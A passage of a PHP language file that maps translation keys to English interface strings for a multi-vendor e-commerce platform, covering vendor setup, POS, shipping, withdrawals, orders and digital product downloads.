'emergency_contact_update_successfully' => 'Emergency contact update successfully', 'vendor_Login' => 'Vendor Login', 'welcome_back_to_vendor_login' => 'Welcome back to vendor login', 'your_account_has_been_suspended' => 'Your account has been suspended', 'please_contact_with' => 'Please contact with', 'help_and_support' => 'Help and support', 'your_account_is_not_approved_yet' => 'Your account is not approved yet', 'please_wait_or_contact_with' => 'Please wait or contact with', 'The_first_name_field_is_required' => 'The first name field is required', 'The_last_name_field_is_required' => 'The last name field is required', 'The_password_must_be_at_least :min_characters' => 'The password must be at least :min characters', 'captcha_failed' => 'Captcha failed', 'order_analytics' => 'Order analytics', 'vendor_Wallet' => 'Vendor Wallet', 'income' => 'Income', 'want_to_change_the_shipping_responsibility_to_Vendor_Wise' => 'Want to change the shipping responsibility to Vendor Wise', 'vendors_will_handle_the_shipping_responsibilities_when_you_choose_vendor_wise_shipping_method' => 'Vendors will handle the shipping responsibilities when you choose vendor wise shipping method', 'vendor_wise_shipping' => 'Vendor wise shipping', 'when_adding_a_product_a_product_specific_shipping_charge_is_added_Verify_that_all_of_the_products_delivery_costs_are_up_to_date' => 'When adding a product a product specific shipping charge is added Verify that all of the products delivery costs are up to date', 'shipping_methods' => 'Shipping methods', 'update_deliveryman' => 'Update deliveryman', 'delivery_man_image' => 'Delivery man image', 'The_password_must_be_at_least_8_characters_long_and_contain_at_least_one_uppercase_letter' => 'The password must be at least 8 characters long and contain at least one uppercase letter', '_one_lowercase_letter' => ' one lowercase letter', '_one_digit_' => ' one digit ', '_one_special_character' => ' one special character', '_and_no_spaces' => ' and no spaces', 'want_to_update_this_delivery_man' => 'Want to update this delivery man', 'search_by_shop_name_or_vendor_name_or_phone_or_email' => 'Search by shop name or vendor name or phone or email', 'vendor_name' => 'Vendor name', 'approved_refund_Requests' => 'Approved refund Requests', 'vendor_Requests' => 'Vendor Requests', 'refund_ID' => 'Refund ID', 'vendor_details' => 'Vendor details', 'want_to_active_this_vendor' => 'Want to active this vendor', 'vendor_information' => 'Vendor information', 'withdraw_request' => 'Withdraw request', 'withdraw_request_table' => 'Withdraw request table', 'add_new_Vendor' => 'Add new Vendor', 'vendor_Image' => 'Vendor Image', 'Jhon' => 'Jhon', 'doe' => 'Doe', 'want_to_add_this_vendor' => 'Want to add this vendor', 'vendor_Orders' => 'Vendor Orders', 'vendor_discount' => 'Vendor discount', 'vendor_net_income' => 'Vendor net income', 'vendor_Information' => 'Vendor Information', 'vendor_setup' => 'Vendor setup', 'set_the_default_commission_amount_that_will_be_received_from_vendors_on_each_order' => 'Set the default commission amount that will be received from vendors on each order', 'enable_POS_in_Vendor_Panel' => 'Enable POS in Vendor Panel', 'if_enabled_POS_will_be_available_on_the_Vendor_Panel' => 'If enabled POS will be available on the Vendor Panel', 'want_to_Turn_ON_POS_for_Vendor' => 'Want to Turn ON POS for Vendor', 'want_to_Turn_OFF_POS_for_Vendor' => 'Want to Turn OFF POS for Vendor', 'if_enabled_POS_option_will_be_available_in_the_Vendor_Panel' => 'If enabled POS option will be available in the Vendor Panel', 'if_disabled_POS_option_will_be_hidden_from_the_Vendor_Panel' => 'If disabled POS option will be hidden from the Vendor Panel', 'vendor_registration' => 'Vendor registration', 'if_enabled_vendors_can_send_registration_requests_to_admin' => 'If enabled vendors can send registration requests to admin', 'if_enabled_Vendors_can_register_by_themselves_from_website_or_app' => 'If enabled Vendors can register by themselves from website or app', 'if_disabled_Vendors_can_not_register_themselves_from_website_or_App' => 'If disabled Vendors can not register themselves from website or App', 'only_Admin_can_create_an_account_for_any_Vendor' => 'Only Admin can create an account for any Vendor', 'if_enabled_Vendors_can_set_minimum_order_amount_for_their_stores_by_themselves' => 'If enabled Vendors can set minimum order amount for their stores by themselves', 'if_disabled_Vendors_cannot_set_the_minimum_order_amount_for_their_store_and_the_admin_will_set_it' => 'If disabled Vendors cannot set the minimum order amount for their store and the admin will set it', 'set_whether_Vendors_need_admin_approval_before_adding_new_products_to_their_shops' => 'Set whether Vendors need admin approval before adding new products to their shops', 'this_feature_will_activate_whenever_a_Vendor_add_a_product_or_modifies_the_shipping_cost_of_any_product' => 'This feature will activate whenever a Vendor add a product or modifies the shipping cost of any product', 'vendor_Product_List' => 'Vendor Product List', 'select_vendor' => 'Select vendor', 'if_you_enable_this_Withdraw_method_will_be_shown_in_the_vendor_app_and_vendor_panel' => 'If you enable this Withdraw method will be shown in the vendor app and vendor panel', 'if_you_disable_this_Withdraw_method_will_not_be_shown_in_the_vendor_app_and_vendor_panel' => 'If you disable this Withdraw method will not be shown in the vendor app and vendor panel', 'if_you_enable_this_Withdraw_method_will_be_set_as_Default_Withdraw_Method_in_the_vendor_app_and_vendor_panel' => 'If you enable this Withdraw method will be set as Default Withdraw Method in the vendor app and vendor panel', 'if_you_disable_this_Withdraw_method_will_be_remove_as_Default_Withdraw_Method_in_the_vendor_app_and_vendor_panel' => 'If you disable this Withdraw method will be remove as Default Withdraw Method in the vendor app and vendor panel', 'default_method_updated_successfully' => 'Default method updated successfully', 'withdrawal_methods' => 'Withdrawal methods', 'add_fields' => 'Add fields', 'select_method_name' => 'Select method name', 'select_field_name' => 'Select field name', 'select_placeholder_text' => 'Select placeholder text', 'vendor_withdraw_information' => 'Vendor withdraw information', 'vendor_info' => 'Vendor info', 'want_to_suspend_this_vendor' => 'Want to suspend this vendor', 'suspend_this_vendor' => 'Suspend this vendor', 'vendor_Details' => 'Vendor Details', 'sales_commission' => 'Sales commission', 'want_to_Turn_ON_Sales_Commission_For_This_Vendor' => 'Want to Turn ON Sales Commission For This Vendor', 'want_to_Turn_OFF_Sales_Commission_For_This_Vendor' => 'Want to Turn OFF Sales Commission For This Vendor', 'want_to_Turn_ON_GST_Number_For_This_Vendor' => 'Want to Turn ON GST Number For This Vendor', 'want_to_Turn_OFF_GST_Number_For_This_Vendor' => 'Want to Turn OFF GST Number For This Vendor', 'vendor_POS' => 'Vendor POS', 'vendor_POS_permission' => 'Vendor POS permission', 'if_enabled_this_vendor_can_access_POS_from_the_website_and_vendor_app' => 'If enabled this vendor can access POS from the website and vendor app', 'want_to_Turn_ON_POS_For_This_Vendor' => 'Want to Turn ON POS For This Vendor', 'want_to_Turn_OFF_POS_For_This_Vendor' => 'Want to Turn OFF POS For This Vendor', 'if_disabled_this_vendor_cannot_access_POS_from_the_website_and_vendor_app' => 'If disabled this vendor cannot access POS from the website and vendor app', 'order_&_shipping_info' => 'Order & shipping info', 'vendor_amount' => 'Vendor amount', 'Vendor_has_been_suspended_successfully' => 'Vendor has been suspended successfully', 'Account_Suspended' => 'Account Suspended', 'Your_Account_Has_Been_Suspended' => 'Your Account Has Been Suspended', 'your_account_access_has_been_suspended_by_admin' => 'Your account access has been suspended by admin', 'from_now_you_can_access_your_app_and_panel_again' => 'From now you can access your app and panel again', 'please_contact_us_for_any_queries _we’re_always_happy_to_help' => 'Please contact us for any queries we’re always happy to help', 'Vendor_Registration' => 'Vendor Registration', 'Hi' => 'Hi', 'please_contact_us_for_any_queries' => 'Please contact us for any queries', '_we’re_always_happy_to_help' => ' we’re always happy to help', 'Thanks_&_Regards' => 'Thanks & Regards', 'Contact_Us' => 'Contact Us', 'All_copy_right_reserved' => 'All copy right reserved', 'want_to_approve_this_update_request' => 'Want to approve this update request', 'want_to_deny_this_update_request' => 'Want to deny this update request', 'product_unit' => 'Product unit', 'variation_wise_price' => 'Variation wise price', 'product_SEO_&_meta_data' => 'Product SEO & meta data', 'video_link' => 'Video link', 'reject_reason' => 'Reject reason', 'want_to_approve_this_product_request_request' => 'Want to approve this product request request', 'brand_not_found' => 'Brand not found', 'review_image' => 'Review image', 'meta_title_not_found' => 'Meta title not found', 'meta_description_not_found' => 'Meta description not found', 'want_to_unblock' => 'Want to unblock', 'want_to_block' => 'Want to block', 'click_for_details' => 'Click for details', 'please_resume_the_order_from_here' => 'Please resume the order from here', 'search_by_customer_name' => 'Search by customer name', 'cart_is_empty' => 'Cart is empty', 'sorry_product_is_out_of_stock' => 'Sorry product is out of stock', 'sorry_the_minimum_value_was_reached' => 'Sorry the minimum value was reached', 'vendor_Order' => 'Vendor Order', 'pending_refund_Requests' => 'Pending refund Requests', 'withdraw_request_denied' => 'Withdraw request denied', 'Vendor_Payment_request_has_been_Denied_successfully' => 'Vendor Payment request has been Denied successfully', 'All_vendor_Page' => 'All vendor Page', 'all_Stores' => 'All Stores', 'Find_your_desired_stores_and_shop_your_favourite_products' => 'Find your desired stores and shop your favourite products', 'Send_Message_to_vendor' => 'Send Message to vendor', 'password_must_be_7+_Character' => 'Password must be 7+ Character', 'my_Address' => 'My Address', 'chat_with_vendor' => 'Chat with vendor', 'you_haven’t_any_conversation_yet' => 'You haven’t any conversation yet', 'great' => 'Great', 'best_delivery_service_highly_recommended' => 'Best delivery service highly recommended', 'send_message_to' => 'Send message to', 'search_delivery_men' => 'Search delivery men', 'want_to_enable_the_Temporary_Close' => 'Want to enable the Temporary Close', 'want_to_disable_the_Temporary_Close' => 'Want to disable the Temporary Close', 'vacation_mode' => 'Vacation mode', 'vacation_start' => 'Vacation start', 'vacation_end' => 'Vacation end', 'vacation_note' => 'Vacation note', 'insufficient_loyalty_point' => 'Insufficient loyalty point', 'my_Inbox' => 'My Inbox', 'delete_my_account' => 'Delete my account', 'Eng' => 'Eng', 'Logo' => 'Logo', 'morning_mart' => 'Morning mart', 'bata' => 'Bata', 'first_shipping' => 'First shipping', 'first_shipping_all_across_the_country' => 'First shipping all across the country', 'authentic_products' => 'Authentic products', 'secure_payment' => 'Secure payment', 'we_ensure_secure_transactions' => 'We ensure secure transactions', 'support_center' => 'Support center', 'we_ensure_quality_support' => 'We ensure quality support', 'open_your_store' => 'Open your store', 'top_stores' => 'Top stores', 'Customer_Added_Successfully' => 'Customer Added Successfully', 'don’t_have_account' => 'Don’t have account', 'character' => 'Character', 'copied-failed' => 'Copied-failed', 'order_can_be_canceled_only_when_pending' => 'Order can be canceled only when pending', 'please_select_a_payment_methods' => 'Please select a payment methods', 'please_retype_password' => 'Please retype password', 'password_must_be_8_Character' => 'Password must be 8 Character', 'hurry_up' => 'Hurry up', 'View_all' => 'View all', 'want_to_order_your_usuals' => 'Want to order your usuals', 'just_reorder_from_your_previous_orders' => 'Just reorder from your previous orders', 'final_total' => 'Final total', 'find' => 'Find', 'happy_club' => 'Happy club', 'featured_deals' => 'Featured deals', 'top_rated_products' => 'Top rated products', 'don’t_miss_the_chance' => 'Don’t miss the chance', 'today’s_best_deal' => 'Today’s best deal', 'reply_sent' => 'Reply sent', 'reply_not_sent' => 'Reply not sent', 'reply_status' => 'Reply status', 'not_sent' => 'Not sent', 'image_type_jpg _jpeg _webp_or_png' => 'Image type jpg jpeg webp or png', 'image_maximum_size_' => 'Image maximum size ', 'more_categories' => 'More categories', 'more_brands' => 'More brands', 'grid_view' => 'Grid view', 'list_view' => 'List view', 'contact_with' => 'Contact with', 'search_product' => 'Search product', 'show_product' => 'Show product', 'details_description' => 'Details description', 'visit_store' => 'Visit store', 'similar_products_from_other_stores' => 'Similar products from other stores', 'my_order_list' => 'My order list', 'show_order' => 'Show order', 'Chat_with_vendor' => 'Chat with vendor', 'my_addresses' => 'My addresses', 'want_to_delete_this_address' => 'Want to delete this address', 'create_your_own_store' => 'Create your own store', 'already_have_store' => 'Already have store', 'open_your_and_start_selling' => 'Open your and start selling', 'jhon' => 'Jhon', 'vendor_image' => 'Vendor image', 'store_secondary_banner' => 'Store secondary banner', 'sorry_out_of_stock' => 'Sorry out of stock', 'product_removed_from_the_wishlist' => 'Product removed from the wishlist', 'do_not_miss_todays_deal' => 'Do not miss todays deal', '0.00' => '0.00', '10 00000' => '10 00000', 'top_rated_vendor' => 'Top rated vendor', 'new_vendor' => 'New vendor', 'loader' => 'Loader', 'dark_Mode' => 'Dark Mode', 'light_Mode' => 'Light Mode', 'vendor_reg' => 'Vendor reg', 'promo' => 'Promo', 'trash' => 'Trash', 'my_inbox' => 'My inbox', 'Click_here_to_see_instructions' => 'Click here to see instructions', 'no_Order_Found' => 'No Order Found', 'you_have_not_placed_any__order_yet' => 'You have not placed any order yet', 'my_order_details_vendor_info' => 'My order details vendor info', 'products_Not_Found' => 'Products Not Found', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_“Ready_After_Sale”_deliveries _customers_pay_first_then_vendor_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products. For “Ready After Sale” deliveries customers pay first then vendor uploads the digital products that become available to customers for download', 123412 => '123412', 'add_color_wise_product_images_here' => 'Add color wise product images here', 'must_upload_colour_wise_images_first' => 'Must upload colour wise images first', 'colour_is_shown_in_the_image_section_top_right.' => 'Colour is shown in the image section top right.', 'want_to_update_this_product' => 'Want to update this product', 'want_to_update_admin_password' => 'Want to update admin password', 'product_gallery' => 'Product gallery', 'if_enabled WhatsApp_chatting_option_will_be_hidden_from_the_system' => 'If enabled WhatsApp chatting option will be hidden from the system', 'map_api_key(Client)' => 'Map api key(Client)', 'if_enabled WhatsApp_chatting_option_will_be_available_in_the_system' => 'If enabled WhatsApp chatting option will be available in the system', 'client_key_should_have_enable_map_javascript_api_and_you_can_restrict_it_with_http_refer' => 'Client key should have enable map javascript api and you can restrict it with http refer', 'proceed_to_Checkout' => 'Proceed to Checkout', 'No_review_given_yet' => 'No review given yet', 'you_need_to_select_address_from_your_selected_country' => 'You need to select address from your selected country', 'faster_&_secure_way_to_pay' => 'Faster & secure way to pay', 'has_been_placed.' => 'Has been placed.', 'when_payment_method_cash_on_delivery_and_order_status_not_delivered_then_you_can`t_change_payment_status_unpaid_to_paid' => 'When payment method cash on delivery and order status not delivered then you can`t change payment status unpaid to paid', 'when_payment_status_paid_then_you_can`t_change_payment_status_paid_to_unpaid' => 'When payment status paid then you can`t change payment status paid to unpaid', 'when_order_status_delivered_you_can`t_update_the_delivery_man_incentive' => 'When order status delivered you can`t update the delivery man incentive', 'add_info_from_gallery' => 'Add info from gallery', 'want_to_turn_OFF_WhatsApp_as_social_media_chat_option' => 'Want to turn OFF WhatsApp as social media chat option', 'Analytic_Scripts' => 'Analytic Scripts', 'google_map_APIs' => 'Google map APIs', 'SMS_config' => 'SMS config', 'social_media_login' => 'Social media login', 'social_media_chat' => 'Social media chat', 'if_enabled map_will_be_hidden_from_the_system' => 'If enabled map will be hidden from the system', 'all_shops' => 'All shops', 'if_enabled map_will_be_available_in_the_system' => 'If enabled map will be available in the system', 'want_to_turn_OFF_map' => 'Want to turn OFF map', 'choose_address_type' => 'Choose address type', 'add_informations' => 'Add informations', 'Update_Addresses' => 'Update Addresses', 'update_Address' => 'Update Address', '_you_cannot_change_the_status_again' => ' you cannot change the status again', 'image_Description' => 'Image Description', 'expense_bearer_' => 'Expense bearer ', 'confirm_payments_before_change_the_status' => 'Confirm payments before change the status', 'change_the_status_paid_only_when_you_received_the_payment_from_customer' => 'Change the status paid only when you received the payment from customer', '_once_you_change_the_status_to_paid' => ' once you change the status to paid', 'digital_payment_methods' => 'Digital payment methods', 'offline_payment_methods' => 'Offline payment methods', 'choose_logo' => 'Choose logo', 'want_to_turn_ON_WhatsApp_as_social_media_chat_option' => 'Want to turn ON WhatsApp as social media chat option', 'want_to_turn_ON_map' => 'Want to turn ON map', 'my_order_details_track_order' => 'My order details track order', 'delivery_complete' => 'Delivery complete', 'order_confirmed' => 'Order confirmed', 'preparing_shipment' => 'Preparing shipment', '0/100' => '0/100', 'want_to_add_this_delivery_man' => 'Want to add this delivery man', 'add_product' => 'Add product', 'search_ticket_by_subject_or_status' => 'Search ticket by subject or status', 'when_the_status_is_enabled_employees_can_access_the_system_to_perform_their_responsibilities' => 'When the status is enabled employees can access the system to perform their responsibilities', 'want_to_Turn_OFF_Employee_Status' => 'Want to Turn OFF Employee Status', 'location_on_Map' => 'Location on Map', 'this_amount_will_be_count_as_admin_expense' => 'This amount will be count as admin expense', 'encourage_your_deliveryman_by_giving_him_incentive' => 'Encourage your deliveryman by giving him incentive', 'this_amount_will_be_count_as_vendor_expense' => 'This amount will be count as vendor expense', 'delivery_man_incentive' => 'Delivery man incentive', 'deliveryman_charge_added_successfully' => 'Deliveryman charge added successfully', 'expected_delivery_date_added_successfully' => 'Expected delivery date added successfully', 'all_Brands_Page' => 'All Brands Page', 'Find_your_favourite_brands_and_products' => 'Find your favourite brands and products', 'edit_personal_details' => 'Edit personal details', 'update_profile' => 'Update profile', 'edit_my_profile' => 'Edit my profile', 'Doe' => 'Doe', 'enter_email_number' => 'Enter email number', 'ex:_7+_characters' => 'Ex: 7+ characters', 'image_size_must_be_within_2MB' => 'Image size must be within 2MB', 'image_format_jpg_jpeg_png' => 'Image format jpg jpeg png', 'password_must_be_8_character' => 'Password must be 8 character', 'select_shipping_method' => 'Select shipping method', 'before_the_vendor_confirms_the_order' => 'Before the vendor confirms the order', 'edit_Address' => 'Edit Address', 'choose_label' => 'Choose label', 'contact_person' => 'Contact person', 'update_address' => 'Update address', '01XXXXXX' => '01XXXXXX', 'ex_:_1216_dhaka' => 'Ex : 1216 dhaka', 'enter_your_city' => 'Enter your city', 'enter_your_zip_code' => 'Enter your zip code', 'ex_:_1216_Dhaka' => 'Ex : 1216 Dhaka', 'language_change_successfully' => 'Language change successfully', 'phone_number_is_required' => 'Phone number is required', 'The_phone_number_must_be_at_least_4_characters' => 'The phone number must be at least 4 characters', 'The_phone_number_may_not_be_greater_than_20_characters' => 'The phone number may not be greater than 20 characters', 'Subject_is_Empty' => 'Subject is Empty', 'Message_is_Empty' => 'Message is Empty', 'Your_Message_Send_Successfully' => 'Your Message Send Successfully', 'No_shipping_options_available_at_this_shop' => 'No shipping options available at this shop', 'please_remove_all_items_from_this_shop' => 'Please remove all items from this shop', 'shipping_Not_Available' => 'Shipping Not Available', 'social' => 'Social', 'the_pagination_limit_must_be_numeric' => 'The pagination limit must be numeric', 'United_States_Dollar' => 'United States Dollar', 'ex:United States Dollar' => 'Ex:United States Dollar', 'default_currency_can_not_be_deleted' => 'Default currency can not be deleted', 'to_delete_change_the_default_currency_first' => 'To delete change the default currency first', 'thank_you_for_your_order!' => 'Thank you for your order!', 'your_order_is_being_processed_and_will_be_completed_within_3_to_6 hours' => 'Your order is being processed and will be completed within 3 to 6 hours', 'basic_information' => 'Basic information', 'full_Name' => 'Full Name', 'want_to_update_vendor_info' => 'Want to update vendor info', 'new_Password' => 'New Password', 'confirm_Password' => 'Confirm Password', 'want_to_update_vendor_password' => 'Want to update vendor password', 'shop_Edit' => 'Shop Edit', 'edit_shop_info' => 'Edit shop info', 'upload_banner' => 'Upload banner', 'banner_image_type_jpg _jpeg _webp_or_png' => 'Banner image type jpg jpeg webp or png', 'banner_maximum_size_' => 'Banner maximum size ', 'bottom_banner_type_jpg _jpeg _webp_or_png' => 'Bottom banner type jpg jpeg webp or png', 'bottom_banner_maximum_size_' => 'Bottom banner maximum size ', 'offer_banner_type_jpg _jpeg _webp_or_png' => 'Offer banner type jpg jpeg webp or png', 'offer_banner_maximum_size_' => 'Offer banner maximum size ', 'Shop_updated_successfully' => 'Shop updated successfully', 'select_Vendor' => 'Select Vendor', 'all_Vendor' => 'All Vendor', 'ex:10' => 'Ex:10', 'coupon_status_updated' => 'Coupon status updated', 'if_you_fill_up_this_section_this_address_will_use_in_future._if_need_to_send_to_you' => 'If you fill up this section this address will use in future. if need to send to you', 'shopping_Details' => 'Shopping Details', 'set_form_map' => 'Set form map', '-94.22213' => '-94.22213', '103.344322' => '103.344322', 'Jhon_Doe' => 'Jhon Doe', '+8801000000000' => '+8801000000000', 1216 => '1216', '+88 01000000000' => '+88 01000000000', 'Dhaka' => 'Dhaka', 'sent_attachments' => 'Sent attachments', 'chatting' => 'Chatting', 'currently_we_are_not_available.' => 'Currently we are not available.', 'but_you_can_ask_or_still_message_us.' => 'But you can ask or still message us.', 'We_will_get_back_to_you_soon.' => 'We will get back to you soon.', 'Thank_you_for_your_patience.' => 'Thank you for your patience.', 'reCAPTCHA_is_now_enabled_for_added_security' => 'ReCAPTCHA is now enabled for added security', 'users_may_be_prompted_to_complete_a_reCAPTCHA_challenge_to_verify_their_human_identity_and protect_against_spam_and_malicious_activity' => 'Users may be prompted to complete a reCAPTCHA challenge to verify their human identity and protect against spam and malicious activity', 'check_in_Accept_the_reCAPTCHA_Terms_of_Service' => 'Check in Accept the reCAPTCHA Terms of Service', 'copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save' => 'Copy Site Key and Secret Key Paste in the input filed below and Save', 'your_payment_has_been_successfully_processed_and_your_order' => 'Your payment has been successfully processed and your order', 'payment_none' => 'Payment none', 'invoice_Date' => 'Invoice Date', 'invoice_of' => 'Invoice of', 'billed_To' => 'Billed To', 'shipping_To' => 'Shipping To', 'item_Description' => 'Item Description', 'unit_Price' => 'Unit Price', 'total_Item_Price' => 'Total Item Price', 'sub_Total' => 'Sub Total', 'thanks_for_the_purchase' => 'Thanks for the purchase', 'change_of_mind_is_not_applicable_as_a_reason_for_refund_or_exchange' => 'Change of mind is not applicable as a reason for refund or exchange', 'after_adding_a_new_language _you_need_to_translate_the_key_contents_for_users_to_experience_this_feature' => 'After adding a new language you need to translate the key contents for users to experience this feature', 'to_translate_a_language_click_the_action_button_from_the_language_table_&_click_translate' => 'To translate a language click the action button from the language table & click translate', 'then_change_the_key_language_value_manually_or_click_the_‘Auto_Translate’_button' => 'Then change the key language value manually or click the ‘Auto Translate’ button', 'Finally _click_‘Update’_to_save_the_changes' => 'Finally click ‘Update’ to save the changes', 'want_to_Turn_ON_Language_Status' => 'Want to Turn ON Language Status', 'want_to_Turn_OFF_Language_Status' => 'Want to Turn OFF Language Status', 'want_to_Change_Default_Language_Status' => 'Want to Change Default Language Status', 'about_our_company' => 'About our company', 'walking_Customer' => 'Walking Customer', 'delivery_Info' => 'Delivery Info', 'self_Delivery' => 'Self Delivery', 'deliveryman_Name' => 'Deliveryman Name', 'deliveryman_Phone' => 'Deliveryman Phone', 'invoice_date' => 'Invoice date', 'want_to_cancel_this_order' => 'Want to cancel this order', 'product_image' => 'Product image', 'not_rated_yet' => 'Not rated yet', 'customer_review' => 'Customer review', 'all_copy_right_reserved_©_2024_' => 'All copy right reserved © 2024 ', 'vendor_Discount' => 'Vendor Discount', 'vendor_Net_Income' => 'Vendor Net Income', 'Profile_Information' => 'Profile Information', 'this_will_be_displayed_as_your_profile_name' => 'This will be displayed as your profile name', 'ABC' => 'ABC', 'phone_Number' => 'Phone Number', 123456789 => '123456789', 'you_can_login_to_your_panel_by_using_this_email' => 'You can login to your panel by using this email', 'enter_confirm_password' => 'Enter confirm password', 'change_Password' => 'Change Password', 'The_password_field_is_required' => 'The password field is required', 'The_confirm_password_field_is_required' => 'The confirm password field is required', 'The_password_and_confirm_password_must_be_match' => 'The password and confirm password must be match', 'The password must be at least 8 characters long and contain at least one uppercase letter one lowercase letter one digit one special character and no spaces.' => 'The password must be at least 8 characters long and contain at least one uppercase letter one lowercase letter one digit one special character and no spaces.', 'last_name_is_required' => 'Last name is required', 'The_image_type_must_be' => 'The image type must be', 'profile_updated_successfully' => 'Profile updated successfully', 'want_to_update_admin_info' => 'Want to update admin info', 'free_shipping' => 'Free shipping', 'Payment_using_your_wallet_balance' => 'Payment using your wallet balance', 'you_get_free_delivery_bonus' => 'You get free delivery bonus', 'N/A' => 'N/A', 'product_not_available_right_now' => 'Product not available right now', 'please_remove_all_products_from_unavailable_vendors' => 'Please remove all products from unavailable vendors', 'Please_remove_this_unavailable_product_for_continue' => 'Please remove this unavailable product for continue', 'Your_order_has_been_successfully_placed' => 'Your order has been successfully placed', 'Thank_you_for_your_purchase!' => 'Thank you for your purchase!', 'details_will_be_sent_to_your_email_shortly.' => 'Details will be sent to your email shortly.', 'Some_items_were_not_added_to_your_cart_because_they_are_currently_unavailable_for_purchase!' => 'Some items were not added to your cart because they are currently unavailable for purchase!', 'Some_items_were_not_added_to_your_cart_because_they_are_currently_unavailable_for_purchase.!' => 'Some items were not added to your cart because they are currently unavailable for purchase.!', 'logged out successfully' => 'Logged out successfully', 'image_ratio_3:1' => 'Image ratio 3:1', 'no_contact_found' => 'No contact found', 'emergency_contact_deleted_successfully' => 'Emergency contact deleted successfully', 'emergency_contact_deleted_successfully!' => 'Emergency contact deleted successfully!', 'logged_out_successfully' => 'Logged out successfully', 'image_ratio_1:1' => 'Image ratio 1:1', 'The_bottom_banner_type_must_be' => 'The bottom banner type must be', '_website' => ' website', 'your_account_is_in_review_process' => 'Your account is in review process', 'please_wait_for_admin_approval' => 'Please wait for admin approval', 'ppppppp' => 'Ppppppp', 'invalid_credential' => 'Invalid credential', 'Shopping Cart' => 'Shopping Cart', 'New_Message' => 'New Message', 'please_check_your_inventory_and_update' => 'Please check your inventory and update', 'There_isn’t_enough_quantity_on_stock' => 'There isn’t enough quantity on stock', 'please_check_your_inventory' => 'Please check your inventory', 'Website View' => 'Website View', 'Notifications' => 'Notifications', 'Can not change payment status before order delivered!' => 'Can not change payment status before order delivered!', 'currently_you_are_managing_banners_for' => 'Currently you are managing banners for', 'no_banner_found' => 'No banner found', 'email@domain.com' => 'Email@domain.com', 'the_url_field_is_required' => 'The url field is required', 'the_image_is_required' => 'The image is required', 'enter_your_order_ID_&_phone_number_to_get_delivery_updates' => 'Enter your order ID & phone number to get delivery updates', 'your_order' => 'Your order', 'download_your_product' => 'Download your product', 'download_Digital_Product' => 'Download Digital Product', 'invalid_order' => 'Invalid order', 'your_digital_product_is_ready.' => 'Your digital product is ready.', 'once_the_seller_has_uploaded_the_product__you_will_be_able_to_download_here_by_using_your_order_info.' => 'Once the seller has uploaded the product you will be able to download here by using your order info.', 'if_you_face_any_issue_during_download_please_until_wait_or_contact_admin_via' => 'If you face any issue during download please until wait or contact admin via', 'verified' => 'Verified', 'invalid_Order_Id_or_phone_Number' => 'Invalid Order Id or phone Number', 'your_have_not_any_digital_product_order' => 'Your have not any digital product order', 'your_have_not_any_digital_product_in_order' => 'Your have not any digital product in order', 'you_have_no_digital_products_in_your_order' => 'You have no digital products in your order', 'file_upload' => 'File upload', 'admin_have_no_permission_for_vendors_digital_product_upload' => 'Admin have no permission for vendors digital product upload', 'drag_and_drop_file_or_Browse_file' => 'Drag and drop file or Browse file', 'digital_file_upload_successfully' => 'Digital file upload successfully', 'an_OTP_has_been_sent_to_your_email_and_phone' => 'An OTP has been sent to your email and phone', 'please_enter_the_OTP_in_the_field_below_to_verify_for_this_download' => 'Please enter the OTP in the field below to verify for this download', 'order_Not_Found' => 'Order Not Found', 'enter_your_order_ID_&_phone_to_get_delivery_updates' => 'Enter your order ID & phone to get delivery updates', 'order_Created_At' => 'Order Created At', 'your_order_has_been_processed' => 'Your order has been processed', 'check_your_email_to_get_the_order_id_and_details' => 'Check your email to get the order id and details', 'View Less' => 'View Less', 'Shop-12_Road-8' => 'Shop-12 Road-8', 'View More' => 'View More', 'if_Flat _discount_amount_will_be_set_as_fixed_amount._If_Percentage _discount_amount_will_be_set_as_percentage.' => 'If Flat discount amount will be set as fixed amount. If Percentage discount amount will be set as percentage.', 'pending_Orders' => 'Pending Orders', 'if_disabled_customers_have_to_use_the_system_added_payment_gateways' => 'If disabled customers have to use the system added payment gateways', 'want_to_Turn_OFF_Offline_Payment_Methods' => 'Want to Turn OFF Offline Payment Methods', 'is_required' => 'Is required', 'if_disabled_vendors_can_not_sell_digital_products_in_their_shops' => 'If disabled vendors can not sell digital products in their shops', 'free_delivery_over_amount_for_every_vendor_if_they_do_not_set_any_range_yet' => 'Free delivery over amount for every vendor if they do not set any range yet', 'free_delivery_over' => 'Free delivery over', 'free_delivery_responsibility' => 'Free delivery responsibility', 'customer_referral_earning' => 'Customer referral earning', 'enjoy_a_borderless_business_experience_with_' => 'Enjoy a borderless business experience with ', 'you_cannot_deliver_to_any_specific_country_or_zip_code_areas_if_it’s_not_added_and_saved' => 'You cannot deliver to any specific country or zip code areas if it’s not added and saved', 'If_only_the ‘Delivery_Available_Zip_Code_Area’ feature_is_enabled _then_you’ll_be_able_to_deliver_on_all_the_zip_code_areas' => 'If only the ‘Delivery Available Zip Code Area’ feature is enabled then you’ll be able to deliver on all the zip code areas', 'want_update_this_invoice_settings' => 'Want update this invoice settings', 'entries' => 'Entries', 'no_matching_data_found' => 'No matching data found', 'total_entries' => 'Total entries', 'filtered' => 'Filtered', 'New_Currency_inserted_successfully' => 'New Currency inserted successfully', 'if_you_enable_it_customers_will_see_Cookie_Settings_in_frontend' => 'If you enable it customers will see Cookie Settings in frontend', 'make_sure_before_changing' => 'Make sure before changing', 'download_generate_sitemap' => 'Download generate sitemap', 'Add_dynamic_url_to_secure_employee_login_access' => 'Add dynamic url to secure employee login access', 'want_to_Turn_ON_Offline_Payment_Methods' => 'Want to Turn ON Offline Payment Methods', 'push_a_description_and_also_identifier_and_continue' => 'Push a description and also identifier and continue', 'social_info_updated_successfully' => 'Social info updated successfully', 'choose_images' => 'Choose images', 'deal' => 'Deal', 'thumbnail' => 'Thumbnail', 'react_domain' => 'React domain', 'please_make_sure_all_the product`s_delivery_charges_are_up_to_date' => 'Please make sure all the product`s delivery charges are up to date', 'Page_Expired' => 'Page Expired', 'please_enter_coupon_code' => 'Please enter coupon code', 'please_enter_discount_amount' => 'Please enter discount amount', 'want_to_place_this_order' => 'Want to place this order', 'email_is_required' => 'Email is required', 'email_must_be_valid' => 'Email must be valid', 'email_already_in_use' => 'Email already in use', 'please_ensure_your_phone_number_is_valid_and_does_not_exceed_20_characters' => 'Please ensure your phone number is valid and does not exceed 20 characters', 'phone_number_with_a_minimum_length_requirement_of_4_characters' => 'Phone number with a minimum length requirement of 4 characters', 'Customer_Registration_Successfully_Completed' => 'Customer Registration Successfully Completed', 